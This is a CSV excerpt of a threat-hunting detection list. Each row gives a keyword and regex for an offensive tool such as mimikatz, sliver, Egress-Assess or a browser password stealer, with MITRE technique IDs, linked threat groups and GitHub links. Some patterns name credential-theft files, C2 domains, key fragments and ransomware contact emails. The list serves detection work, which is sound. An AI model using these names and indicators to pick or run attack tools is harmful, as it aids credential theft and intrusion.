"*MicroBurst-MSOL*",".{0,1000}MicroBurst\-MSOL.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","Scattered Spider*","Exploitation tool","https://github.com/NetSPI/MicroBurst","1","1","N/A","N/A","6","10","2143","320","2025-03-19T17:07:24Z","2018-07-16T16:47:20Z","51960"
"*microchsse.strangled.net*",".{0,1000}microchsse\.strangled\.net.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","51961"
"*microlilics.crabdance.com*",".{0,1000}microlilics\.crabdance\.com.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","51962"
"*micronaoko.jumpingcrab.com*",".{0,1000}micronaoko\.jumpingcrab\.com.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","51963"
"*microplants.strangled.net*",".{0,1000}microplants\.strangled\.net.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","51964"
"*Microsoft\Windows\Recent\PrivescCheck*",".{0,1000}Microsoft\\Windows\\Recent\\PrivescCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","51971"
"*microsoft-edge/cookies.txt*",".{0,1000}microsoft\-edge\/cookies\.txt.{0,1000}","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","N/A","10","5","423","62","2024-07-12T10:30:42Z","2020-09-15T09:23:56Z","51972"
"*microsoft-edge/credit_cards.txt*",".{0,1000}microsoft\-edge\/credit_cards\.txt.{0,1000}","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","N/A","10","5","423","62","2024-07-12T10:30:42Z","2020-09-15T09:23:56Z","51973"
"*microsoft-edge/history.txt*",".{0,1000}microsoft\-edge\/history\.txt.{0,1000}","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","N/A","10","5","423","62","2024-07-12T10:30:42Z","2020-09-15T09:23:56Z","51974"
"*microsoft-edge/login_data.txt*",".{0,1000}microsoft\-edge\/login_data\.txt.{0,1000}","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","N/A","10","5","423","62","2024-07-12T10:30:42Z","2020-09-15T09:23:56Z","51975"
"*microsoft-edge\cookies.txt*",".{0,1000}microsoft\-edge\\cookies\.txt.{0,1000}","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","N/A","10","5","423","62","2024-07-12T10:30:42Z","2020-09-15T09:23:56Z","51976"
"*microsoft-edge\credit_cards.txt*",".{0,1000}microsoft\-edge\\credit_cards\.txt.{0,1000}","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","N/A","10","5","423","62","2024-07-12T10:30:42Z","2020-09-15T09:23:56Z","51977"
"*microsoft-edge\history.txt*",".{0,1000}microsoft\-edge\\history\.txt.{0,1000}","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","N/A","10","5","423","62","2024-07-12T10:30:42Z","2020-09-15T09:23:56Z","51978"
"*microsoft-edge\login_data.txt*",".{0,1000}microsoft\-edge\\login_data\.txt.{0,1000}","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","N/A","10","5","423","62","2024-07-12T10:30:42Z","2020-09-15T09:23:56Z","51979"
"*microsploit.git*",".{0,1000}microsploit\.git.{0,1000}","offensive_tool_keyword","BruteSploit","Fast and easy create backdoor office exploitation using module metasploit packet . Microsoft Office . Open Office . Macro attack . Buffer Overflow","T1587 - T1588 - T1608","N/A","N/A","N/A","Exploitation tool","https://github.com/screetsec/Microsploit","1","1","N/A","N/A","N/A","5","439","121","2017-07-11T16:28:27Z","2017-03-16T05:26:55Z","51980"
"*MIDL_INTERFACE(""A949CB4E-C4F9-44C4-B213-6BF8AA9AC69C"")*",".{0,1000}MIDL_INTERFACE\(\""A949CB4E\-C4F9\-44C4\-B213\-6BF8AA9AC69C\""\).{0,1000}","offensive_tool_keyword","Chrome-App-Bound-Encryption-Decryption","Tool to decrypt App-Bound encrypted keys in Chrome using the IElevator COM interface with path validation and encryption protections","T1003 - T1081 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/xaitax/Chrome-App-Bound-Encryption-Decryption","1","0","#content","N/A","9","5","401","73","2025-04-22T08:30:00Z","2024-10-27T11:28:35Z","51981"
"*Midl2Bytes.exe*",".{0,1000}Midl2Bytes\.exe.{0,1000}","offensive_tool_keyword","SharpSystemTriggers","Collection of remote authentication triggers in C#","T1078 - T1059.001 - T1550","TA0008 ","N/A","N/A","Lateral Movement","https://github.com/cube0x0/SharpSystemTriggers","1","1","N/A","N/A","10","5","483","57","2024-05-15T21:24:56Z","2021-09-12T18:18:15Z","51982"
"*--mifi-username * --mifi-password * --number +*",".{0,1000}\-\-mifi\-username\s.{0,1000}\s\-\-mifi\-password\s.{0,1000}\s\-\-number\s\+.{0,1000}","offensive_tool_keyword","SMShell","PoC for a SMS-based shell. Send commands and receive responses over SMS from mobile broadband capable computers","T1021.001 - T1059.006 - T1071.004 - T1069.003","TA0002 - TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/persistent-security/SMShell","1","0","N/A","N/A","10","10","360","35","2023-05-22T10:40:16Z","2023-05-22T08:26:44Z","51983"
"*mifunftyundf6deg.azurewebsites.net*",".{0,1000}mifunftyundf6deg\.azurewebsites\.net.{0,1000}","offensive_tool_keyword","PeriscopeC2","walmart's C2 - complete adversarial operations toolkit (C2 - stagers - agents - automated ephemeral redirectors and task runners - a complete phishing engine)","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/malcomvetter/Periscope","1","1","N/A","N/A","9","","N/A","","","","51984"
"*MIGkAgEBBDBido1KtKSwQah/WIoGkDZDX2WPXdexUVAmi0tf6Pd9vK5pfpt2II*",".{0,1000}MIGkAgEBBDBido1KtKSwQah\/WIoGkDZDX2WPXdexUVAmi0tf6Pd9vK5pfpt2II.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","51985"
"*MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqKav9bmrSMSPwnxA3ul*",".{0,1000}MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqKav9bmrSMSPwnxA3ul.{0,1000}","offensive_tool_keyword","golang_c2","C2 written in Go for red teams aka gorfice2k","T1071 - T1021  -  T1090","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/m00zh33/golang_c2","1","0","N/A","N/A","10","10","6","8","2019-03-18T00:46:41Z","2019-03-19T02:39:59Z","51986"
"*MIIDBzCCAe+gAwIBAgIJAINGOZrDXvI2MA0GCSqGSIb3DQEBCwUAMCcxJTAjBgNV*",".{0,1000}MIIDBzCCAe\+gAwIBAgIJAINGOZrDXvI2MA0GCSqGSIb3DQEBCwUAMCcxJTAjBgNV.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","51987"
"*MIIEoQIBAAKCAQEArJqP/6XFBa88x/DUootMmSzYa3MxcTV9FjNYUomqbQlGzuHa*",".{0,1000}MIIEoQIBAAKCAQEArJqP\/6XFBa88x\/DUootMmSzYa3MxcTV9FjNYUomqbQlGzuHa.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","51988"
"*MIIEowIBAAKCAQEAunMwNRcEEAUJQSZDeDh/hGmpPEzMr1v9fVYie4uFD33thh1k*",".{0,1000}MIIEowIBAAKCAQEAunMwNRcEEAUJQSZDeDh\/hGmpPEzMr1v9fVYie4uFD33thh1k.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/lgandx/Responder-Windows/","1","0","#base64","N/A","10","6","523","137","2024-07-30T11:10:05Z","2015-02-07T22:59:04Z","51989"
"*MIIEowIBAAKCAQEAvZtOCbMyFKJN3n89nctTfYLSeiCTNG01rAFl06hMkobyzr0c*",".{0,1000}MIIEowIBAAKCAQEAvZtOCbMyFKJN3n89nctTfYLSeiCTNG01rAFl06hMkobyzr0c.{0,1000}","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","N/A","N/A","10","5","488","89","2024-06-08T21:03:50Z","2020-09-20T18:22:36Z","51990"
"*MIIEpAIBAAKCAQEAp4fWROz5dd1ylzYsMWYY6Y+EBfPjvieE7EniddfMkA7ss47F*",".{0,1000}MIIEpAIBAAKCAQEAp4fWROz5dd1ylzYsMWYY6Y\+EBfPjvieE7EniddfMkA7ss47F.{0,1000}","offensive_tool_keyword","MetasploitCoop","Post-exploitation collaboration platform based on MSF","T1105 - T1098 - T1104 - T1136","TA0010 - TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x727/MetasploitCoop-Backend","1","0","#certificate","N/A","10","10","37","8","2021-08-17T10:26:17Z","2021-08-17T07:52:12Z","51991"
"*MIIEpAIBAAKCAQEAqqKav9bmrSMSPwnxA3ulIleTPGiL9LGtdROute8ncU0HzPyL*",".{0,1000}MIIEpAIBAAKCAQEAqqKav9bmrSMSPwnxA3ulIleTPGiL9LGtdROute8ncU0HzPyL.{0,1000}","offensive_tool_keyword","golang_c2","C2 written in Go for red teams aka gorfice2k","T1071 - T1021  -  T1090","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/m00zh33/golang_c2","1","0","N/A","N/A","10","10","6","8","2019-03-18T00:46:41Z","2019-03-19T02:39:59Z","51992"
"*MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQC9ZoKnCHwsOdxe*",".{0,1000}MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQC9ZoKnCHwsOdxe.{0,1000}","offensive_tool_keyword","DKMC","Malicious payload evasion tool","T1027 - T1055.012","TA0005 - TA0040","N/A","Molerats","Defense Evasion","https://github.com/Mr-Un1k0d3r/DKMC","1","0","#base64","N/A","10","10","1392","290","2020-07-20T03:36:56Z","2016-12-05T03:44:07Z","51994"
"*MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQCvmG0yhEe7dfN+*",".{0,1000}MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQCvmG0yhEe7dfN\+.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","51995"
"*MIIFFDCCAvwCCQDBhPvYPqGG4jANBgkqhkiG9w0BAQsFADBMMQswCQYDVQQGEwJH*",".{0,1000}MIIFFDCCAvwCCQDBhPvYPqGG4jANBgkqhkiG9w0BAQsFADBMMQswCQYDVQQGEwJH.{0,1000}","offensive_tool_keyword","NamelessC2","A C2 with all its components written in Rust","T1102 - T1573.001 - T1027 - T1219 - T1205","TA0011 - TA0003 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/trickster0/NamelessC2","1","0","#certificate","N/A","10","10","266","33","2024-09-26T21:21:20Z","2024-09-26T21:06:37Z","51996"
"*MIIJQQIBADANBgkqhkiG9w0BAQEFAASCCSswggknAgEAAoICAQDCRidsrTMB3NRW*",".{0,1000}MIIJQQIBADANBgkqhkiG9w0BAQEFAASCCSswggknAgEAAoICAQDCRidsrTMB3NRW.{0,1000}","offensive_tool_keyword","NamelessC2","A C2 with all its components written in Rust","T1102 - T1573.001 - T1027 - T1219 - T1205","TA0011 - TA0003 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/trickster0/NamelessC2","1","0","#certificate","N/A","10","10","266","33","2024-09-26T21:21:20Z","2024-09-26T21:06:37Z","51998"
"*Mikedillov1986@onionmail.org*",".{0,1000}Mikedillov1986\@onionmail\.org.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51999"
"*MikLYmAklY555@cock.li*",".{0,1000}MikLYmAklY555\@cock\.li.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","52000"
"*mimi32.exe *",".{0,1000}mimi32\.exe\s.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52001"
"*mimi64.exe *",".{0,1000}mimi64\.exe\s.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52002"
"*Mimi-Command *",".{0,1000}Mimi\-Command\s.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/anthemtotheego/SharpSploitConsole","1","0","N/A","N/A","10","2","182","36","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z","52003"
"*Mimi-Command privilege::*",".{0,1000}Mimi\-Command\sprivilege\:\:.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/anthemtotheego/SharpSploitConsole","1","0","N/A","N/A","10","2","182","36","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z","52004"
"*mimidogz-master.zip*",".{0,1000}mimidogz\-master\.zip.{0,1000}","offensive_tool_keyword","mimidogz","Rewrite of Invoke-Mimikatz.ps1 to avoid AV detection","T1055 - T1560.001 - T1110.001 - T1003 - T1071","TA0005 - TA0040 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/projectb-temp/mimidogz","1","1","N/A","N/A","10","1","0","0","2019-02-11T10:14:10Z","2019-02-11T10:12:08Z","52005"
"*mimidrv (mimikatz)*",".{0,1000}mimidrv\s\(mimikatz\).{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52006"
"*mimidrv*",".{0,1000}mimidrv.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz exploitation ","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52007"
"*mimidrv.pdb*",".{0,1000}mimidrv\.pdb.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52008"
"*mimidrv.sys*",".{0,1000}mimidrv\.sys.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz exploitation ","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52009"
"*mimidrv.sys*",".{0,1000}mimidrv\.sys.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52010"
